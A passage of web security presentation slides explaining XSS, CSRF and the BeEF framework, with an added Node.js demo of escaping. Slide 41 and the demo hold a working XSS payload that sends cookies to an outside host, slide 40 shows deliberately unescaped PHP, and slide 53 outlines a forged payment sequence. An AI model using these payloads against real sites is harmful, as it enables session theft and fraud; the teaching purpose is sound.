37. So just how bad is the bad stuff the bad people do?
38.
OWASP, the Open Web Application Security Project, categorises the ten most critical web application security risks. Known as the OWASP Top 10, it's a great resource: www.owasp.org
39. Cross Site Scripting (XSS)
In the OWASP Top 10 (the 2010 edition) XSS comes in at number 2, described as follows:
“XSS flaws occur when an application includes user supplied data in a page sent to the
browser without properly validating or escaping that content”
40. Server code:
1. Take the 'greeting' parameter:
page.php?greeting=<input>
2. Dynamically echo it, unescaped, into the response:
<p><?php echo $_GET['greeting'] ?></p>
41. What if greeting was:
<script>img=new Image();img.src='http://frichot.com/nom.php?cookie='+document.cookie;</script>
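The echo on slide 40 and the cookie-stealing greeting on slide 41, reproduced as an added Node.js example (this is not code from the original slides). It renders the same parameter twice, once exactly as the PHP does and once HTML-escaped, so you can see that the escaped version never produces a live script element. The example URL, the bank host name and the helper names are assumptions made for the illustration; the payload is the one on the slide.

```javascript
// Added example, not from the original slides: vulnerable vs. escaped rendering of
// the 'greeting' parameter, fed the cookie-stealing payload from slide 41.

// Constructed payload: identical to the one on slide 41.
const PAYLOAD =
  "<script>img=new Image();img.src='http://frichot.com/nom.php?cookie='+document.cookie;</script>";

// Parse the query string the way page.php?greeting=<input> would see it.
// (Hypothetical host name; only the query matters.)
function greetingFromQuery(url) {
  return new URL(url, 'http://localhost').searchParams.get('greeting') ?? '';
}

// Vulnerable: the Node equivalent of <p><?php echo $_GET['greeting'] ?></p>.
// Whatever the user sent becomes markup, so a <script> in the parameter runs.
function renderUnsafe(greeting) {
  return `<p>${greeting}</p>`;
}

// Hardened: escape the five characters that can switch the HTML parser out of
// text context. This is what htmlspecialchars($greeting, ENT_QUOTES, 'UTF-8')
// does in PHP; it is the right escaping for an HTML *body* context only.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(greeting) {
  return `<p>${escapeHtml(greeting)}</p>`;
}

// Crude check used below: does the rendered page contain a script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demo.
const url = 'http://bank.example/page.php?greeting=' + encodeURIComponent(PAYLOAD);
const greeting = greetingFromQuery(url);
console.log('unsafe  :', renderUnsafe(greeting));
console.log('escaped :', renderSafe(greeting));
```

Two caveats worth keeping in mind: escaping is context-specific, so the same value placed inside a JavaScript string, a URL or an attribute needs that context's escaping rather than HTML entities; and setting the session cookie `HttpOnly` stops `document.cookie` from reading it, which blunts this particular payload but does nothing to stop the injected script itself.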
45. Cross Site Request Forgery (CSRF)
CSRF comes in at number 5 in the OWASP Top 10, described as:
“Since browsers send credentials like session cookies automatically, attackers can create
malicious web pages which generate forged requests that are indistinguishable from
legitimate ones.”
53. The request sequence a forged payment has to reproduce:
1. GET request to the Add New Contact page
2. POST request to add the contact
3. POST request to confirm the new contact
4. POST request to create a payment to the contact
5. POST request to confirm the payment
60.
BeEF is currently made up of 3 main components: Core, Extensions & Modules
61.
Firstly, the core.
62. CORE
- Central API for Extensions & Modules
- Filters
- Primary client-side JavaScript
- Server-side asset handling and web servicing
- Ruby extensions
- Database models
- Hooking methods to load and manage arbitrary extensions and command modules